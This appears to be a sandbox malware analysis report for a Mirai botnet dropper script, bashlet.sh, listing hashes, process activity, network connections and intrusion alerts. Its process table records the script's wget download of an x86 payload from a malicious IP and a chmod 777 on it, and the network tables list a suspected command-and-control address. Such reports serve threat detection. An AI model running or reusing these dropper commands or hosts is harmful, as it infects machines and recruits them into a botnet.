File name:	bashlet.sh
Full analysis:	https://app.any.run/tasks/f827ed1f-9ac8-403e-87ac-5bfb424e5c20
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	January 23, 2025, 20:01:11
OS:	Ubuntu 22.04.2 LTS
Tags:	opendir mirai botnet
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	61979E46FC5D5C7F5770854FD233EBEA
SHA1:	D149426DFF45AE6E27B5488209B1BB9CD9C565E0
SHA256:	ABB77349093A7D80E7C3CE76EF3B64A18FAA64FD59F7AB4230408F67CAD88999
SSDEEP:	3:GRFaZdqBRWKJbUaDOSd9ax0pxU:SCg/JbUaDr9aSp+

PID	CMD	Path	Indicators	Parent process
38754	/bin/sh -c "sudo chown user /home/user/Desktop/bashlet\.sh && chmod +x /home/user/Desktop/bashlet\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/bashlet\.sh "	/usr/bin/dash	—	any-guest-agent
User: user Integrity Level: UNKNOWN Exit code: 0
38755	sudo chown user /home/user/Desktop/bashlet.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38758	chown user /home/user/Desktop/bashlet.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
38759	chmod +x /home/user/Desktop/bashlet.sh	/usr/bin/chmod	—	dash
User: user Integrity Level: UNKNOWN Exit code: 0
38760	/bin/sh -e /etc/NetworkManager/dispatcher.d/01-ifupdown connectivity-change	/usr/bin/dash	—	nm-dispatcher
User: root Integrity Level: UNKNOWN Exit code: 0
38764	sudo -iu user /home/user/Desktop/bashlet.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38766	-bash --login -c \/home\/user\/Desktop\/bashlet\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
38767	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38768	wget http://147.185.221.25:27143/lawl/telnet.x86	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
38769	chmod 777 telnet.x86	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	—	91.189.91.97:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
—	—	GET	—	91.189.91.97:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
—	—	GET	204	185.125.190.49:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
38768	wget	GET	200	147.185.221.25:27143	http://147.185.221.25:27143/lawl/telnet.x86	unknown	—	—	malicious
—	—	GET	200	37.19.194.80:443	https://odrs.gnome.org/1.0/reviews/api/ratings	unknown	binary	1.63 Mb	unknown
—	—	GET	200	37.19.194.80:443	https://odrs.gnome.org/1.0/reviews/api/ratings	unknown	binary	1.63 Mb	unknown
—	—	GET	200	37.19.194.80:443	https://odrs.gnome.org/1.0/reviews/api/ratings	unknown	binary	1.63 Mb	unknown
—	—	POST	200	185.125.188.55:443	https://api.snapcraft.io/v2/snaps/refresh	unknown	—	—	unknown
—	—	POST	200	185.125.188.58:443	https://api.snapcraft.io/api/v1/snaps/auth/nonces	unknown	binary	53 b	unknown
—	—	POST	200	185.125.188.54:443	https://api.snapcraft.io/api/v1/snaps/auth/sessions	unknown	binary	587 b	unknown

PID	Process	IP	Domain	ASN	CN	Reputation
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	91.189.91.97:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
—	—	185.125.190.49:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
—	—	212.102.56.179:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
38768	wget	147.185.221.25:27143	—	PLAYIT-GG	US	malicious
512	snapd	185.125.188.55:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
38771	telnet.x86	45.55.219.156:37212	—	DIGITALOCEAN-ASN	US	unknown

Domain	IP	Reputation
connectivity-check.ubuntu.com	91.189.91.97 185.125.190.98 185.125.190.97 185.125.190.96 185.125.190.48 91.189.91.49 91.189.91.48 185.125.190.49 91.189.91.96 91.189.91.98 185.125.190.18 185.125.190.17 2620:2d:4000:1::97 2620:2d:4000:1::23 2620:2d:4000:1::22 2620:2d:4000:1::2a 2001:67c:1562::23 2620:2d:4002:1::196 2620:2d:4002:1::198 2620:2d:4000:1::96 2001:67c:1562::24 2620:2d:4000:1::98 2620:2d:4000:1::2b 2620:2d:4002:1::197	whitelisted
odrs.gnome.org	212.102.56.179 169.150.255.184 207.211.211.26 37.19.194.80 195.181.170.19 169.150.255.180 195.181.175.40 2a02:6ea0:c700::11 2a02:6ea0:c700::19 2a02:6ea0:c700::101 2a02:6ea0:c700::21 2a02:6ea0:c700::18 2a02:6ea0:c700::107 2a02:6ea0:c700::112	whitelisted
google.com	142.250.181.238 2a00:1450:4001:806::200e	whitelisted
api.snapcraft.io	185.125.188.55 185.125.188.59 185.125.188.54 185.125.188.58 2620:2d:4000:1010::6d 2620:2d:4000:1010::2e6 2620:2d:4000:1010::42 2620:2d:4000:1010::117	whitelisted
57.100.168.192.in-addr.arpa	—	unknown

PID	Process	Class	Message
38768	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download
38768	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .x86
38768	wget	Potentially Bad Traffic	ET INFO x86 File Download Request from IP Address
38771	telnet.x86	Malware Command and Control Activity Detected	BOTNET [ANY.RUN] Possible Mirai.Gen (Linux)
38771	telnet.x86	Malware Command and Control Activity Detected	BOTNET [ANY.RUN] Possible Mirai.Gen (Linux)
38771	telnet.x86	Malware Command and Control Activity Detected	BOTNET [ANY.RUN] Possible Mirai.Gen (Linux)
38771	telnet.x86	Malware Command and Control Activity Detected	BOTNET [ANY.RUN] Possible Mirai.Gen (Linux)
38771	telnet.x86	Malware Command and Control Activity Detected	BOTNET [ANY.RUN] Possible Mirai.Gen (Linux)
38771	telnet.x86	Malware Command and Control Activity Detected	BOTNET [ANY.RUN] Possible Mirai.Gen (Linux)
38771	telnet.x86	Malware Command and Control Activity Detected	BOTNET [ANY.RUN] Possible Mirai.Gen (Linux)

General Info

bashlet.sh

61979E46FC5D5C7F5770854FD233EBEA

D149426DFF45AE6E27B5488209B1BB9CD9C565E0

ABB77349093A7D80E7C3CE76EF3B64A18FAA64FD59F7AB4230408F67CAD88999

3:GRFaZdqBRWKJbUaDOSd9ax0pxU:SCg/JbUaDr9aSp+

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been detected (SURICATA)

SUSPICIOUS

Modifies file or directory owner

Uses wget to download content

Executes the "rm" command to delete files or directories

Connects to unusual port

Executes commands using command-line interpreter

Potential Corporate Privacy Violation

Contacting a server suspected of hosting an CnC

INFO

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings